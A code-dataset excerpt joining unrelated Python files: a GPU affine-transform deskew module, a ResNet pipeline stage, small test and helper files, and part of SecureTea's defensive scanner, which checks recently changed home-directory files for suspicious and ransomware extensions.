const sampler_t sampler = SAMPLER_ADDRESS | SAMPLER_FILTER;
uint i = get_global_id(0);
uint j = get_global_id(1);
uint k = get_global_id(2);
float x = i;
float y = j;
float z = k;
float x2 = (mat[8] * z + mat[9] * y + mat[10] * x + mat[11]) + 0.5f;
float y2 = (mat[4] * z + mat[5] * y + mat[6] * x + mat[7]) + 0.5f;
float z2 = (mat[0] * z + mat[1] * y + mat[2] * x + mat[3]) + 0.5f;
uint Nx = get_global_size(0);
uint Ny = get_global_size(1);
float4 coord_norm = (float4)(x2, y2, z2, 0.f);
output[i + Nx * j + Nx * Ny * k] = read_imagef(input, sampler, coord_norm).x;
}
"""
class holder:
    # Plain attribute namespace; get_gpu() lazily attaches device/ctx/queue.
    pass
# Module-level singleton holding lazily-initialised OpenCL state.
GPU = holder()
def get_best_device():
    """Pick the 'best' available OpenCL device.

    The device-type enum value dominates the ranking; total global memory
    size breaks ties between devices of the same type.
    """
    all_devices = [
        dev
        for plat in cl.get_platforms()
        for dev in plat.get_devices()
    ]
    return max(
        all_devices,
        key=lambda d: d.type * 1e12 + d.get_info(cl.device_info.GLOBAL_MEM_SIZE),
    )
def get_gpu(reload=False):
    """Return the module-wide OpenCL state, creating it on first use.

    Pass ``reload=True`` to force re-selection of the device and a fresh
    context/queue.
    """
    if not hasattr(GPU, "device") or reload:
        GPU.device = get_best_device()
        GPU.ctx = cl.Context(devices=[GPU.device])
        GPU.queue = cl.CommandQueue(GPU.ctx)
    return GPU
@lru_cache(maxsize=128)
def get_affine_program(ctx, order: int = 1, mode="constant"):
    """Build (and cache) the affine-transform OpenCL program for *ctx*.

    ``order`` 0 selects nearest-neighbour sampling and 1 trilinear; ``mode``
    selects the out-of-bounds addressing mode of the sampler.
    """
    filter_flags = {
        0: ["-D", "SAMPLER_FILTER=CLK_FILTER_NEAREST"],
        1: ["-D", "SAMPLER_FILTER=CLK_FILTER_LINEAR"],
    }
    address_flags = {
        "constant": ["-D", "SAMPLER_ADDRESS=CLK_ADDRESS_CLAMP"],
        "wrap": ["-D", "SAMPLER_ADDRESS=CLK_ADDRESS_REPEAT"],
        "edge": ["-D", "SAMPLER_ADDRESS=CLK_ADDRESS_CLAMP_TO_EDGE"],
        "nearest": ["-D", "SAMPLER_ADDRESS=CLK_ADDRESS_CLAMP_TO_EDGE"],
        "mirror": ["-D", "SAMPLER_ADDRESS=CLK_ADDRESS_MIRRORED_REPEAT"],
    }
    program = cl.Program(ctx, affine_source)
    program.build(options=filter_flags[order] + address_flags[mode])
    return program
def _debug_context(ctx):
    # Debug helper: dump the 3D image formats supported by *ctx* and every
    # image-related capability attribute of its devices.
    print(
        cl.get_supported_image_formats(
            ctx, cl.mem_flags.READ_WRITE, cl.mem_object_type.IMAGE3D
        )
    )
    for device in ctx.devices:
        print("DEVICE: ", device)
        for attr in dir(device):
            if attr.startswith("image"):
                print(f"  {attr}", getattr(device, attr))
@lru_cache(maxsize=32)
def _get_image_format(ctx, num_channels, dtype, ndim, mode="rw"):
    """Maximize chance of finding a supported image format.

    Returns a ``(cl.ImageFormat, reshape_flag)`` tuple.  ``reshape_flag`` is 1
    only when a single-channel image must be expanded to RGBA by the caller
    because the device supports no 1-channel format for this dtype.
    """
    if mode == "rw":
        mode_flag = cl.mem_flags.READ_WRITE
    elif mode == "r":
        mode_flag = cl.mem_flags.READ_ONLY
    elif mode == "w":
        mode_flag = cl.mem_flags.WRITE_ONLY
    else:
        raise ValueError("invalid value '%s' for 'mode'" % mode)
    if ndim == 3:
        _dim = cl.mem_object_type.IMAGE3D
    elif ndim == 2:
        _dim = cl.mem_object_type.IMAGE2D
    elif ndim == 1:
        _dim = cl.mem_object_type.IMAGE1D
    else:
        raise ValueError(f"Unsupported number of image dimensions: {ndim}")
    supported_formats = cl.get_supported_image_formats(ctx, mode_flag, _dim)
    channel_type = cl.DTYPE_TO_CHANNEL_TYPE[dtype]
    if num_channels == 1:
        # Try 1-channel orders in preference order before falling back.
        for order in [
            cl.channel_order.INTENSITY,
            cl.channel_order.R,
            cl.channel_order.Rx,
        ]:
            fmt = cl.ImageFormat(order, channel_type)
            if fmt in supported_formats:
                return fmt, 0
        # Fallback: RGBA with the caller replicating the channel (flag 1).
        fmt = cl.ImageFormat(cl.channel_order.RGBA, channel_type)
        if fmt in supported_formats:
            return fmt, 1
        raise ValueError(
            f"No supported ImageFormat found for dtype {dtype} with 1 channel\n",
            f"Supported formats include: {supported_formats}",
        )
    img_format = {
        2: cl.channel_order.RG,
        3: cl.channel_order.RGB,
        4: cl.channel_order.RGBA,
    }[num_channels]
    return cl.ImageFormat(img_format, channel_type), 0
# vendored from pyopencl.image_from_array so that we can change the img_format
# used for a single channel image to channel_order.INTENSITY
def _image_from_array(ctx, ary, num_channels=None, mode="r", norm_int=False):
    """Create a ``cl.Image`` from a host array (pyopencl vendored variant).

    NOTE(review): ``norm_int`` is accepted for signature compatibility but is
    never read in this body -- confirm whether it should affect the format.
    """
    if not ary.flags.c_contiguous:
        raise ValueError("array must be C-contiguous")
    dtype = ary.dtype
    if num_channels is None:
        import pyopencl.cltypes
        try:
            # If the dtype is a vector type, split it into scalar + count.
            dtype, num_channels = pyopencl.cltypes.vec_type_to_scalar_and_count[dtype]
        except KeyError:
            # It must be a scalar type then.
            num_channels = 1
        shape = ary.shape
        strides = ary.strides
    elif num_channels == 1:
        shape = ary.shape
        strides = ary.strides
    else:
        # Multi-channel: the last axis holds the channels.
        if ary.shape[-1] != num_channels:
            raise RuntimeError("last dimension must be equal to number of channels")
        shape = ary.shape[:-1]
        strides = ary.strides[:-1]
    if mode == "r":
        mode_flags = cl.mem_flags.READ_ONLY
    elif mode == "w":
        mode_flags = cl.mem_flags.WRITE_ONLY
    else:
        raise ValueError("invalid value '%s' for 'mode'" % mode)
    img_format, reshape = _get_image_format(ctx, num_channels, dtype, ary.ndim)
    if reshape:
        # Device offers no 1-channel format: replicate the channel into RGBA.
        import warnings
        warnings.warn("Device support forced reshaping of single channel array to RGBA")
        ary = np.ascontiguousarray(np.repeat(ary[..., np.newaxis], 4, axis=-1))
        shape = ary.shape[:-1]
        strides = ary.strides[:-1]
    assert ary.strides[-1] == ary.dtype.itemsize
    # OpenCL image shapes/pitches are fastest-axis-first, hence the reversal.
    return cl.Image(
        ctx,
        mode_flags | cl.mem_flags.COPY_HOST_PTR,
        img_format,
        shape=shape[::-1],
        pitches=strides[::-1][1:],
        hostbuf=ary,
    )
def image_from_array(arr, ctx, *args, **kwargs):
    """Wrap a 2-4D host array in a ``cl.Image``, annotated with dtype/shape."""
    if arr.ndim not in {2, 3, 4}:
        raise ValueError(
            "dimension of array wrong, should be 2 - 4 but is %s" % arr.ndim
        )
    if arr.dtype.type == np.complex64:
        # NOTE(review): stock pyopencl's cl.Image has no classmethod
        # ``empty``/``write_array`` with this signature -- this branch looks
        # borrowed from another library; verify it is ever exercised.
        num_channels = 2
        res = cl.Image.empty(arr.shape, dtype=np.float32, num_channels=num_channels)
        res.write_array(arr)
        res.dtype = np.float32
    else:
        num_channels = arr.shape[-1] if arr.ndim == 4 else 1
        res = _image_from_array(
            ctx, np.ascontiguousarray(arr), num_channels=num_channels, *args, **kwargs
        )
        res.dtype = arr.dtype
    # Stash bookkeeping attributes for downstream consumers.
    res.num_channels = num_channels
    res.ndim = arr.ndim
    return res
if cl:
    # GPU implementation; shadows the scipy fallback imported above.
    def affine_transform(
        input,
        matrix,
        offset=0.0,
        output_shape=None,
        output=None,
        order=0,
        mode="constant",
        cval=0.0,
        prefilter=None,
    ):
        """Apply an affine transform to a 3D volume on the GPU via OpenCL.

        Parameters
        ----------
        input : array_like
            The input array.
        matrix : ndarray
            The inverse coordinate transformation matrix, mapping output
            coordinates to input coordinates. If ``ndim`` is the number of
            dimensions of ``input``, the given matrix must have one of the
            following shapes:
        offset : float or sequence, optional
            The offset into the array where the transform is applied. If a float,
            `offset` is the same for each axis. If a sequence, `offset` should
            contain one value for each axis.
            NOTE(review): currently accepted but unused by this GPU path.
        output_shape : tuple of ints, optional
            Shape tuple.
        output : array or dtype, optional
            The array in which to place the output, or the dtype of the returned array.
            By default an array of the same dtype as input will be created.
            NOTE(review): currently accepted but unused; a float32 array is
            always allocated and returned.
        order : int, optional
            The order of the spline interpolation, default is 0.
            The order has to be in the range 0-1. (bi-cubic not yet supported)
        mode : {'constant', 'nearest', 'mirror', 'wrap'}, optional
            The mode parameter determines how the input array is extended beyond its
            boundaries. Default is 'constant'. Behavior for each valid value is as follows:
            - 'constant' (k k k k | a b c d | k k k k)
                The input is extended by filling all values beyond the edge with the same
                constant value, defined by the cval parameter.
            - 'nearest' (a a a a | a b c d | d d d d)
                The input is extended by replicating the last pixel.
            - 'mirror' (d c b | a b c d | c b a)
                The input is extended by reflecting about the center of the last pixel.
            - 'wrap' (a b c d | a b c d | a b c d)
                The input is extended by wrapping around to the opposite edge.
        cval : scalar, optional
            Value to fill past edges of input if mode is 'constant'. Default is 0.0.
            NOTE(review): currently unused; the sampler's clamp behaviour applies.
        prefilter : bool, optional
            not supported
        """
        if order < 0 or order > 1:
            raise NotImplementedError(
                "spline orders other than 0 or 1 not yet supported"
            )
        out_shape = input.shape if output_shape is None else output_shape
        if prefilter is not None:
            raise NotImplementedError("prefilter is not yet supported")
        gpu = get_gpu()
        affine3D = get_affine_program(gpu.ctx, order, mode).affine3D
        # Upload the volume as an image (hardware-sampled) and run the kernel.
        dev_img = image_from_array(input.astype(np.float32, copy=False), gpu.ctx)
        res_g = empty(gpu.queue, out_shape, np.float32)
        mat_inv_g = to_device(gpu.queue, np.require(matrix, np.float32, "C"))
        # Global size is fastest-axis-first, hence the shape reversal.
        affine3D(gpu.queue, out_shape[::-1], None, dev_img, res_g.data, mat_inv_g.data)
        return res_g.get()
def deskew_block(block, mat=None, out_shape=None, padval=0):
    """Affine-transform the trailing 3 dims of *block*, keeping leading dims.

    NOTE(review): ``padval`` is accepted but currently unused -- confirm.
    """
    n_leading = block.ndim - 3
    # Take the first element along every leading axis; keep the last three.
    volume = block[(0,) * n_leading + (slice(None),) * 3]
    result = affine_transform(volume, mat, output_shape=tuple(out_shape[-3:]), order=0)
    # Re-insert singleton leading axes so the output rank matches the input.
    return result[(None,) * n_leading + (...,)]
deskew_counter = 0  # debug counter: number of deskew invocations so far


def get_deskew_func(shape, dz=0.5, dx=0.1, angle=31.5, padval=0):
    """Build a deskew function for skewed light-sheet stacks.

    Parameters
    ----------
    shape : tuple
        Array shape; the last three axes are interpreted as (nz, ny, nx).
    dz, dx : float
        Stage step and pixel size used to compute the shear factor.
    angle : float
        Light-sheet angle in degrees.
    padval : int
        Forwarded to :func:`deskew_block`.

    Returns
    -------
    (callable, list, float)
        The deskew function, the output shape (x axis grown to hold the
        sheared volume), and the new dz/dx ratio after deskewing.
    """
    # calculate affine matrix from globals
    deskewFactor = np.cos(np.deg2rad(angle)) * dz / dx
    mat = np.eye(4)
    mat[2, 0] = -deskewFactor
    # calculate shape of output array
    (nz, ny, nx) = shape[-3:]
    out_shape = [1] * (len(shape) - 3) + list(shape[-3:])
    # new nx -- note: np.int was deprecated in NumPy 1.20 and removed in
    # 1.24; the builtin int is the documented replacement.
    out_shape[-1] = int(np.floor((nz - 1) * -mat[2, 0]) + nx)
    new_dzdx_ratio = np.sin(np.deg2rad(angle)) * dz / dx

    def noisy_deskew(arr):
        # to see, set: logging.getLogger("napari_ndtiffs").setLevel(logging.DEBUG)
        global deskew_counter
        deskew_counter += 1
        logger.debug(f"deskew #{deskew_counter}")
        return deskew_block(arr, mat=mat, out_shape=out_shape, padval=padval)

    return noisy_deskew, out_shape, new_dzdx_ratio
| 31.598916
| 91
| 0.613808
|
4a15a821b710253ad67c78439d49282b799bfd96
| 2,312
|
py
|
Python
|
runtime/image_classification/models/resnet50/gpus=2/stage2.py
|
vibhatha/pipedream
|
af6b811f5d01a68e9eb91065e5242fc1a075f279
|
[
"MIT"
] | null | null | null |
runtime/image_classification/models/resnet50/gpus=2/stage2.py
|
vibhatha/pipedream
|
af6b811f5d01a68e9eb91065e5242fc1a075f279
|
[
"MIT"
] | null | null | null |
runtime/image_classification/models/resnet50/gpus=2/stage2.py
|
vibhatha/pipedream
|
af6b811f5d01a68e9eb91065e5242fc1a075f279
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import torch
class Stage2(torch.nn.Module):
    """One auto-partitioned pipeline stage of a ResNet-style network.

    Receives two activation tensors from the previous stage and returns two
    tensors for the next stage; the layer numbering mirrors the generated
    partitioned graph (layer8 is skipped in the numbering -- presumably the
    slot of the elementwise add performed in ``forward``).
    """
    def __init__(self):
        super(Stage2, self).__init__()
        self.layer2 = torch.nn.Conv2d(1024, 2048, kernel_size=(1, 1), stride=(2, 2), bias=False)
        self.layer3 = torch.nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        self.layer4 = torch.nn.ReLU(inplace=True)
        self.layer5 = torch.nn.Conv2d(512, 2048, kernel_size=(1, 1), stride=(1, 1), bias=False)
        self.layer6 = torch.nn.BatchNorm2d(2048, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        self.layer7 = torch.nn.BatchNorm2d(2048, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        self.layer9 = torch.nn.ReLU(inplace=True)
        self.layer10 = torch.nn.Conv2d(2048, 512, kernel_size=(1, 1), stride=(1, 1), bias=False)
        self.layer11 = torch.nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        self.layer12 = torch.nn.ReLU(inplace=True)
        self.layer13 = torch.nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
        self.layer14 = torch.nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        self._initialize_weights()

    def forward(self, input0, input1):
        # Clone the stage inputs so in-place ops below cannot alias upstream
        # buffers held by the pipeline runtime.
        out0 = input1.clone()
        out1 = input0.clone()
        out2 = self.layer2(out1)
        out3 = self.layer3(out0)
        out4 = self.layer4(out3)
        out5 = self.layer5(out4)
        out6 = self.layer6(out2)
        out7 = self.layer7(out5)
        # Residual join: shortcut (out6) plus main branch (out7), in place.
        out6 += out7
        out9 = self.layer9(out6)
        out10 = self.layer10(out9)
        out11 = self.layer11(out10)
        out12 = self.layer12(out11)
        out13 = self.layer13(out12)
        out14 = self.layer14(out13)
        # Both the post-ReLU join (out9) and the block output (out14) are
        # forwarded to the next stage.
        return (out9, out14)

    def _initialize_weights(self):
        # Standard ResNet init: Kaiming for convs, (1, 0) for batch norms.
        for m in self.modules():
            if isinstance(m, torch.nn.Conv2d):
                torch.nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
            elif isinstance(m, torch.nn.BatchNorm2d):
                torch.nn.init.constant_(m.weight, 1)
                torch.nn.init.constant_(m.bias, 0)
| 46.24
| 113
| 0.620242
|
4a15a8eba1dded74673be151dd2ab9421d6d23a1
| 523
|
py
|
Python
|
biobb_amber/test/unitests/test_pdb4amber/test_pdb4amber_pdb4amber.py
|
bioexcel/biobb_amber
|
84c61d07158ada71e0bce0fd99216a1b49e21787
|
[
"Apache-2.0"
] | null | null | null |
biobb_amber/test/unitests/test_pdb4amber/test_pdb4amber_pdb4amber.py
|
bioexcel/biobb_amber
|
84c61d07158ada71e0bce0fd99216a1b49e21787
|
[
"Apache-2.0"
] | 1
|
2021-09-23T06:30:35.000Z
|
2021-09-23T10:11:16.000Z
|
biobb_amber/test/unitests/test_pdb4amber/test_pdb4amber_pdb4amber.py
|
bioexcel/biobb_amber
|
84c61d07158ada71e0bce0fd99216a1b49e21787
|
[
"Apache-2.0"
] | null | null | null |
from biobb_common.tools import test_fixtures as fx
from biobb_amber.pdb4amber.pdb4amber_run import pdb4amber_run
class TestPdb4amberRun():
    """Unit test for the biobb_amber pdb4amber_run building block."""
    # NOTE(review): camelCase setUp/tearDown hooks are auto-invoked only for
    # unittest.TestCase subclasses; confirm the project's pytest setup
    # actually calls these for this plain class.
    def setUp(self):
        # Populates self.properties / self.paths from the test fixtures.
        fx.test_setup(self, 'pdb4amber_run')

    def tearDown(self):
        fx.test_teardown(self)
        pass

    def test_pdb4amber_run(self):
        # Run the step, then check the output exists and matches the reference.
        pdb4amber_run(properties=self.properties, **self.paths)
        assert fx.not_empty(self.paths['output_pdb_path'])
        assert fx.equal(self.paths['output_pdb_path'], self.paths['ref_output_pdb_path'])
| 32.6875
| 89
| 0.720841
|
4a15a9704766214fd79a88d3ded01d8965e954ab
| 374
|
py
|
Python
|
mkt/operators/helpers.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
mkt/operators/helpers.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
mkt/operators/helpers.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
import jinja2
from jingo import register
from tower import ugettext_lazy as _lazy
from mkt.developers.helpers import mkt_page_title
@register.function
@jinja2.contextfunction
def operators_page_title(context, title=None):
    """Build the page title for the Operator Dashboard section.

    With a title: "<title> | Operator Dashboard"; otherwise just the
    section name.
    """
    section = _lazy('Operator Dashboard')
    if title:
        full_title = u'%s | %s' % (title, section)
    else:
        full_title = section
    return mkt_page_title(context, full_title)
| 24.933333
| 63
| 0.772727
|
4a15a999cc7a530427c2f5c81b8f8aed5cb67e46
| 146
|
py
|
Python
|
app/worker_service/core/loggers.py
|
TheRayOfSeasons/worker-heavy-cicd
|
fa36e89dd68ee2fd8b37bda55d6bb885f31afaa7
|
[
"MIT"
] | null | null | null |
app/worker_service/core/loggers.py
|
TheRayOfSeasons/worker-heavy-cicd
|
fa36e89dd68ee2fd8b37bda55d6bb885f31afaa7
|
[
"MIT"
] | null | null | null |
app/worker_service/core/loggers.py
|
TheRayOfSeasons/worker-heavy-cicd
|
fa36e89dd68ee2fd8b37bda55d6bb885f31afaa7
|
[
"MIT"
] | null | null | null |
"""
A script that imports a standartd centralized logger.
"""
import logging
# Module-wide logger named after this module; emits INFO and above.
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
| 16.222222
| 53
| 0.773973
|
4a15ab6455d2609849fd95761c48dd0795890408
| 756
|
py
|
Python
|
code_builder.py
|
LiXuanqi/neeko
|
6a8978282dfb8d7ed0cb7fd2bfa0f662906cd12f
|
[
"MIT"
] | null | null | null |
code_builder.py
|
LiXuanqi/neeko
|
6a8978282dfb8d7ed0cb7fd2bfa0f662906cd12f
|
[
"MIT"
] | null | null | null |
code_builder.py
|
LiXuanqi/neeko
|
6a8978282dfb8d7ed0cb7fd2bfa0f662906cd12f
|
[
"MIT"
] | null | null | null |
class CodeBuilder:
    """Accumulates indented source-code lines (and nested sections), renders
    them to a string, and can execute the result to harvest its globals."""

    INDENT_STEP = 4

    def __init__(self, indent=0):
        self.code = []
        self.indentLevel = indent

    def addLine(self, line):
        """Append one line of code at the current indentation level."""
        self.code.append(" " * self.indentLevel)
        self.code.append(line)
        self.code.append("\n")

    def indent(self):
        """Increase indentation for subsequently added lines."""
        self.indentLevel += self.INDENT_STEP

    def dedent(self):
        """Decrease indentation for subsequently added lines."""
        self.indentLevel -= self.INDENT_STEP

    def addSection(self):
        """Reserve a nested builder at the current indent.

        The section renders inline wherever it was inserted, so code can be
        added to it later, out of order.
        """
        section = CodeBuilder(self.indentLevel)
        self.code.append(section)
        return section

    def __str__(self):
        # Nested CodeBuilder sections stringify recursively here.
        parts = [str(chunk) for chunk in self.code]
        return "".join(parts)

    def getGlobals(self):
        """Execute the rendered source and return its global namespace."""
        assert self.indentLevel == 0
        namespace = {}
        exec(str(self), namespace)
        return namespace
| 24.387097
| 62
| 0.603175
|
4a15ab78bac9706b48af3145400d4556d26bc6ad
| 11,555
|
py
|
Python
|
securetea/lib/malware_analysis/continuous_malware_defence.py
|
Off3nsiv3huNt/SecureTea-Project
|
ae55082d4a342f10099db4dead23267a517e1a66
|
[
"MIT"
] | 257
|
2018-03-28T12:43:20.000Z
|
2022-03-29T07:07:23.000Z
|
securetea/lib/malware_analysis/continuous_malware_defence.py
|
Off3nsiv3huNt/SecureTea-Project
|
ae55082d4a342f10099db4dead23267a517e1a66
|
[
"MIT"
] | 155
|
2018-03-31T14:57:46.000Z
|
2022-03-17T18:12:41.000Z
|
securetea/lib/malware_analysis/continuous_malware_defence.py
|
Off3nsiv3huNt/SecureTea-Project
|
ae55082d4a342f10099db4dead23267a517e1a66
|
[
"MIT"
] | 132
|
2018-03-27T06:25:20.000Z
|
2022-03-28T11:32:45.000Z
|
# !/bin/python
# -*- coding: utf-8 -*-
u"""SecureTea Social Engineering
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Digvijay Bhosale <digvijayb1729@gmail.com> August 19 2021
Version: 1.0
Module: SecureTea
"""
import subprocess
import os
import time
import datetime
import pandas
import json
import threading
from securetea.lib.malware_analysis import malwareAnalysis
from securetea.lib.malware_analysis import malwareAnalysisJSONDisplay
from securetea.lib.malware_analysis import globals
class ContinuousDefence(threading.Thread):
    """Background thread that periodically scans the user's home directory
    for recently modified files with suspicious extensions, submits them for
    malware analysis, detects DJVU-ransomware extensions, and reports results
    (optionally into shared ``globals`` state consumed by the GUI)."""

    def __init__(self, gui=True, API_KEY=None):
        """
        :param gui: when True, results are also pushed into the shared
            ``globals`` module for the GUI to display.
        :param API_KEY: scanning-service API key, forwarded to MalwareAnalysis.
        """
        threading.Thread.__init__(self)
        self.gui = gui
        self.API_KEY = API_KEY
        # Extensions worth submitting for analysis at all.
        self.mal_extensions = ['exe',
                               'doc', 'docx', 'docm', 'rtf',
                               'xls', 'xlsx',
                               'hta', 'html', 'htm',
                               'js', 'jar',
                               'py',
                               'vbs', 'vb',
                               'pdf',
                               'sfx', 'dll', 'bat', 'tmp', '.py', 'scr', 'zip', '7z', 'bz', 'gz', 'com',
                               'jpeg', 'jpg', 'png', 'mng'
                               ]
        # Extensions always scanned even when the file count is large.
        self.high_threat_ext = ['exe',
                                'pdf'
                                ]
        # Known file extensions produced by DJVU/STOP ransomware variants.
        self.djvu_ext = ['shadow', 'djvu', 'djvur', 'djvuu', 'udjvu', 'uudjvu', 'djvuq', 'djvus', 'djvur', 'djvut',
                         'pdff', 'tro', 'tfude', 'tfudet', 'tfudeq', 'rumba', 'adobe', 'adobee', 'blower', 'promos',
                         'promoz', 'promorad', 'promock', 'promok', 'promorad2', 'kroput', 'kroput1', 'pulsar1',
                         'kropun1', 'charck', 'klope', 'kropun', 'charcl', 'doples', 'luces', 'luceq', 'chech',
                         'proden', 'drume', 'tronas', 'trosak', 'grovas', 'grovat', 'roland', 'refols', 'raldug',
                         'etols', 'guvara', 'browec', 'norvas', 'moresa', 'vorasto', 'hrosas', 'kiratos', 'todarius',
                         'hofos', 'roldat', 'dutan', 'sarut', 'fedasot', 'berost', 'forasom', 'fordan', 'codnat',
                         'codnat1', 'bufas', 'dotmap', 'radman', 'ferosas', 'rectot', 'skymap', 'mogera', 'rezuc',
                         'stone', 'redmat', 'lanset', 'davda', 'poret', 'pidom', 'pidon', 'heroset', 'boston', 'muslat',
                         'gerosan', 'vesad', 'horon', 'neras', 'truke', 'dalle', 'lotep', 'nusar', 'litar', 'besub',
                         'cezor', 'lokas', 'godes', 'budak', 'vusad', 'herad', 'berosuce', 'gehad', 'gusau', 'madek',
                         'darus', 'tocue', 'lapoi', 'todar', 'dodoc', 'bopador', 'novasof', 'ntuseg', 'ndarod',
                         'access', 'format', 'nelasod', 'mogranos', 'cosakos', 'nvetud', 'lotej', 'kovasoh', 'prandel',
                         'zatrov', 'masok', 'brusaf', 'londec', 'krusop', 'mtogas', 'nasoh', 'nacro', 'pedro', 'nuksus',
                         'vesrato', 'masodas', 'cetori', 'stare', 'carote', 'gero', 'hese', 'seto', 'peta', 'moka',
                         'kvag', 'karl', 'nesa', 'noos', 'kuub', 'reco', 'bora', 'reig', 'tirp', 'plam', 'cosd', 'ygkz',
                         'cadq', 'ribd', 'qlkm', 'coos', 'wbxd', 'pola']
        self.directory = ''          # home directory to scan, set by find_home()
        self.mal_files = {}          # {path: extension} candidates for analysis
        self.djvu_files = {}         # {path: extension} suspected ransomware hits
        globals.initialize()
        globals.initialize_colours()

    def run(self):
        """
        Thread main loop: find the home directory, collect suspicious files,
        scan them, then sleep for an hour and repeat.  Program flow starts here.
        """
        while True:
            try:
                self.find_home()
                # self.directory = '/home/fox/GSOC/OWASP/SecureTea-Dev/test_files'
                self.find_malicious_extensions()
                self.scan_mal_files()
                print(globals.GRAY + 'Scan completed at : ' + str(datetime.datetime.now().time()) + globals.END)
                if self.gui:
                    globals.ctime = str(datetime.datetime.now().time())
                print(globals.GRAY + "Next Scan in 1 hour" + globals.END)
                # Reset state so the next pass only reports fresh findings.
                self.mal_files.clear()
                self.djvu_files.clear()
                time.sleep(3600)
                # time.sleep(60)
            except KeyboardInterrupt:
                print(globals.WARNING + '\nKeyboardInterrupt... Quitting' + globals.END)
                exit(0)

    def dev_runner(self, files_dict):  # implements threading. NOT A START POINT OF PROGRAM
        """
        uses threading to send files to malwareAnalysis.py
        Uses global variables from globals.py
        Starts threads
        Global vars intialized here
        Edited in JSONDisplay.py
        Accessed here again

        Returns the (detected, undetected, unsupported, total, report_id)
        dicts accumulated in ``globals`` by the worker threads.
        """
        globals.detected.clear()
        globals.undetected.clear()
        globals.unsupported.clear()
        globals.total.clear()
        globals.report_id.clear()
        # print(*list(self.mal_files.keys()), sep="\n")
        thread_list = []
        for mal_file in files_dict.keys():
            t = threading.Thread(target=self.scan_mal_files_threading, args=(mal_file,))
            thread_list.append(t)
            t.start()
            # Stagger submissions -- presumably to respect the scanning
            # service's rate limit; confirm before changing.
            time.sleep(15)
        for a_thread in thread_list:
            a_thread.join()
        '''
        if len(self.mal_files.keys()) < 100:
            print(globals.OKBLUE + 'Number of files < 100. Scanning all files' + globals.END)
            for mal_file in self.mal_files.keys():
                t = threading.Thread(target=self.scan_mal_files_threading, args=(mal_file,))
                thread_list.append(t)
                t.start()
                time.sleep(15)
            for a_thread in thread_list:
                a_thread.join()
        else:
            print(globals.OKBLUE + 'Number of files > 100. Scanning important files only' + globals.END)
            no_of_files_is_0 = True
            for mal_file in self.mal_files.keys():
                if self.mal_files[mal_file] in self.high_threat_ext:
                    no_of_files_is_0 = False
                    t = threading.Thread(target=self.scan_mal_files_threading, args=(mal_file,))
                    thread_list.append(t)
                    t.start()
                    time.sleep(15)
            if no_of_files_is_0:
                return 'detected', 'undetected', 'unsupported', 'total', 'report_id'
        '''
        return globals.detected, globals.undetected, globals.unsupported, globals.total, globals.report_id

    def scan_mal_files_threading(self, filename):
        # Worker body: analyse one file; results land in the shared globals.
        mal_obj = malwareAnalysis.MalwareAnalysis(filename=filename, API_KEY=self.API_KEY)
        mal_obj.threat_level_threading()

    def find_home(self):
        """
        finds home directory

        NOTE(review): picks the *first* entry of ``ls /home`` -- on systems
        with several users only that one is scanned.
        """
        base_directory = '/home'
        process = subprocess.Popen(['ls', base_directory],
                                   stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        data = stdout.decode('utf-8')
        stderr = stderr.decode('utf-8')
        data = data.split('\n')
        data = str(data[0])
        # print(data)
        self.directory = base_directory + '/' + data

    def find_malicious_extensions(self):
        """
        finds files modified last 1 hour with probablmalicious extensions. stores that in
        self.djvu_files
        self.mal_files
        """
        # find -mmin -72: files modified within the last 72 minutes.
        process = subprocess.Popen(['find', self.directory, '-type', 'f', '-mmin', '-72'],
                                   stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE)
        '''
        1.2 hours because scan takes some time
        in that time, user may download some files that may go unnoticed by our program
        '''
        stdout, stderr = process.communicate()
        data = stdout.decode('utf-8')
        stderr = stderr.decode('utf-8')
        data = data.split('\n')
        for filename in data:
            # Extension = text after the last dot of the basename ('' if none).
            temp = filename.split('/')[-1]
            ext = temp.split('.')
            if len(ext) == 1:
                ext = ''
            else:
                ext = ext[-1]
            if ext.lower() in self.djvu_ext:
                print(globals.HEADER + 'DJVU Ransomware detected' + globals.END)
                self.djvu_files[filename] = ext
            elif ext.lower() in self.mal_extensions:
                self.mal_files[filename] = ext

    def scan_mal_files(self):
        """
        Sends the mal files for scanning.
        Takes 5 dicts from dev_runner
        loads it into a dataframe
        Prints table
        """
        print(globals.HEADER + 'Total number of files changed in past 1 hour : ' + str(
            len(self.mal_files.keys())) + globals.END)
        for mal_file in self.mal_files.keys():
            print(mal_file)
        print(globals.HEADER + 'Total number of DJVU files found in past 1 hour : ' + str(
            len(self.djvu_files.keys())) + globals.END)
        for djvu_file in self.djvu_files.keys():
            print(globals.ALERT + djvu_file + globals.END)
        if len(self.djvu_files.keys()) != 0:
            if self.gui:
                for djvu_file in self.djvu_files:
                    globals.djvu_files.append(djvu_file)
                    # print("File in globals.djvu_files")
        # no of mal files = 0
        if len(self.mal_files.keys()) == 0:
            return
        crit_files = {}
        # no of mal files < 100 --> scan all files
        if len(self.mal_files.keys()) < 100:
            print(globals.OKBLUE + 'Number of files < 100. Scanning all files' + globals.END)
            detected, undetected, unsupported, total, report_id = self.dev_runner(files_dict=self.mal_files)
        # if no of mal files > 100 --> scan critical files
        else:
            print(globals.OKBLUE + 'Number of files > 100. Scanning critical files only' + globals.END)
